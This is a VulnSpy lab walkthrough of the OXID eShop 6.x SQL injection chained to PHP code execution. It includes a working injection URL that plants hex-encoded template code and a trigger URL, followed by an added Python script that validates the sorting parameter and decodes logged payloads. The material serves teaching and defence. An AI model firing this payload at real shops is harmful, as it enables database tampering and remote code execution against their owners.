OXID eShop 6.x <= 6.3.4 SQL Injection (SQLi) to RCE Vulnerability Exploit


Introduction

RIPS Tech disclosed a SQL injection vulnerability in OXID eShop in June 2019. It allows an unauthenticated attacker to execute arbitrary SQL statements and can be chained into execution of arbitrary PHP code.

OXID eShop is a free, open-source e-commerce and shopping-cart solution. It originated in Germany, and its enterprise edition is used by industry leaders such as Mercedes, Bitburger and Edeka. In OXID eShop 6.x <= 6.3.4 the aSorting parameter stored in the session was not filtered before being used in a query, resulting in a SQL injection vulnerability. A detailed vulnerability analysis can be found in the RIPS post "WARNING: Pre-Auth Takeover of OXID eShops".

Exploit

1. Click the Start to Hack button in the upper right corner of the page to create an online OXID eShop environment.

2. Click on any product item in the web page.

e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html

3. Append the sorting parameter to the URL of the item detail page (this inserts PHP code into the database via SQL injection).

e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html?sorting=oxtitle|;insert into oxcontents(OXID,OXLOADID,OXPOSITION,OXACTIVE,OXTITLE,OXCONTENT,OXACTIVE_1,OXTITLE_1,OXCONTENT_1,OXFOLDER,OXTERMVERSION) 
VALUES(0x313233343536,0x76756c6e73707964656d6f, 0x00, 1, 0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d, 1, 0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d, 0x434d53464f4c4445525f55534552494e464f, 0x00);%23

4. Accessing the following link triggers the PHP code execution and displays the PHPINFO page if the exploit succeeded.

http://***.vsgo.cloud/source/index.php?cl=content&oxloadid=vulnspydemo
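The following Python script is an added example, not part of the original VulnSpy page and not OXID's own code, showing the defender's side of steps 3 and 4: it validates a sorting value of the shape field|direction against an allowlist instead of passing the raw string into SQL, and, for request URLs that fail validation, decodes the MySQL 0x hex literals so an analyst reading web-server logs can see what the injected statement would have written to oxcontents. The field|direction shape is inferred from the step-3 payload; the allowlisted column names, the shop.example host and the sample request lines are constructed for this example, and none of the functions are OXID APIs.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed allowlist of sortable columns for the example; a real shop would
# derive this from its own configuration rather than trust any request value.
ALLOWED_SORT_FIELDS = {"oxtitle", "oxprice", "oxartnum"}

# Shape inferred from the "sorting=oxtitle|..." payload: one column name,
# a pipe, and a direction. Anything else is rejected outright.
SORTING_RE = re.compile(r"^(?P<field>[a-z0-9_]+)\|(?P<dir>asc|desc)$", re.IGNORECASE)

# MySQL hex string literals such as 0x76756c6e73707964656d6f.
HEX_LITERAL_RE = re.compile(r"0x([0-9a-fA-F]{2,})")


def validate_sorting(value):
    """Return (field, direction) for a well-formed, allowlisted sorting value.

    Raises ValueError otherwise. The caller builds ORDER BY from the returned
    allowlisted constants, never from the raw request string.
    """
    match = SORTING_RE.match(value or "")
    if not match:
        raise ValueError("sorting is not of the form field|asc or field|desc")
    field = match.group("field").lower()
    if field not in ALLOWED_SORT_FIELDS:
        raise ValueError("sort field %r is not allowlisted" % field)
    return field, match.group("dir").lower()


def decode_hex_literals(text):
    """Decode every 0x... literal in a rejected value to readable text."""
    decoded = []
    for hexdigits in HEX_LITERAL_RE.findall(text):
        try:
            decoded.append(bytes.fromhex(hexdigits).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            decoded.append("<undecodable 0x%s>" % hexdigits)
    return decoded


def query_params(url):
    """Split a URL's query string on '&' only, keeping ';' inside values."""
    params = {}
    for pair in urlsplit(url).query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(unquote_plus(key), unquote_plus(value))
    return params


def triage_request(url):
    """Classify one request URL from a web-server log.

    Returns {"verdict": "no-sorting"}, {"verdict": "ok", ...} or
    {"verdict": "reject", "reason": ..., "literals": [...]}.
    """
    params = query_params(url)
    if "sorting" not in params:
        return {"verdict": "no-sorting"}
    raw = params["sorting"]
    try:
        field, direction = validate_sorting(raw)
        return {"verdict": "ok", "field": field, "direction": direction}
    except ValueError as exc:
        return {"verdict": "reject", "reason": str(exc),
                "literals": decode_hex_literals(raw)}


# Constructed sample request lines modelled on the page's step-3 URL,
# percent-encoded the way a web server would log them.
SAMPLE_REQUESTS = [
    "http://shop.example/source/en/Kiteboarding/Kites/Kite-CORE-GT.html?sorting=oxtitle|asc",
    "http://shop.example/source/en/Kiteboarding/Kites/Kite-CORE-GT.html"
    "?sorting=oxtitle|;insert%20into%20oxcontents(OXID,OXLOADID,OXPOSITION,OXACTIVE,"
    "OXTITLE,OXCONTENT,OXACTIVE_1,OXTITLE_1,OXCONTENT_1,OXFOLDER,OXTERMVERSION)%20"
    "VALUES(0x313233343536,0x76756c6e73707964656d6f,0x00,1,0x76756c6e73707964656d6f,"
    "0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d,1,0x76756c6e73707964656d6f,"
    "0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d,0x434d53464f4c4445525f55534552494e464f,"
    "0x00);%23",
]

if __name__ == "__main__":
    for url in SAMPLE_REQUESTS:
        print(triage_request(url))
```

Running the script prints an "ok" verdict for the legitimate request and a "reject" for the injected one, with the decoded literals showing the OXLOADID value (vulnspydemo) that step 4 later requests. The query string is split on "&" by hand rather than with parse_qs because older Python versions also split on ";", which would cut the injected statement into pieces and hide it from the decoder.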

Ref

All rights reserved. © 2020 VULNSPY